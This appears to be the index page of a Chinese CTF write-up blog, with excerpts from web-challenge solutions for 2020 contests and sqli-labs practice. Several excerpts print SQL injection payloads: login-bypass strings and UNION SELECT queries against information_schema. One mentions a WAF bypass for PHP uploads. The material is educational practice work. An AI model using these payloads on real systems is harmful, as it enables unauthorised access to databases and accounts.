-
READ MORE
Hackergame 2020 数理模拟器 什么?sympy自带latex_parser可以转换latex?是 […]
-
READ MORE
N1CTF2020 SignIn 知识点:sql+反序列化 <?php class ip { publi […]
-
READ MORE
西湖论剑2020 newupload 这道题的一个考点是最新宝塔面板的waf对php文件上传的一个绕过 这里没 […]
-
READ MORE
本来是看不上sqlibab的,因为很多题可以用同一句话注入,都没啥做下去的欲望,但是发现自己注入还是太生疏,很多东西记不住,看来还是需要多练习并且记点东西以便查阅和回忆
-
READ MORE
强网杯2020,DDCTF2020部分web题解
-
READ MORE
周末事很多,就打了一个下午加一个晚上,不过就算给我再多时间估计也就这样了 WEB SSRF ME 考点:SSR […]
-
READ MORE
这次除了Web,还有一点misc(其实web基本做不出,还是misc做出的多一些,惨惨)
WEB
sqlcheckin
知识点:万能钥匙
靶机:看看ctfhub上有没有
参考链接:没有
Payload:
password=1′-‘1
解析:
这道题我真的是无能为力了,这种万能钥匙还是第一次见。
在MySQL中测试如下: -
READ MORE
反序列化
例题:http://server.icystal.top/2345.php
Payload:http://server.icystal.top/create2345.php
MessyPHP
例题:http://34.82.101.212/
Payload: unicode emoji+xor+php_mt_seed|| 时间爆破 -
READ MORE
前言
本来是不打算写CTF的,但是发现自己总是记不住,没办法了
简单的招聘系统
知识点:万能钥匙
靶机:
Payload:
登录:
lname=%27%3D0–+&lpass=
查询:
‘ union select 1,database(),3,4,5;#
‘ union select 1,count(table_name),3,4,5 from information_schema.tables where table_schema=’nzhaopin’;#
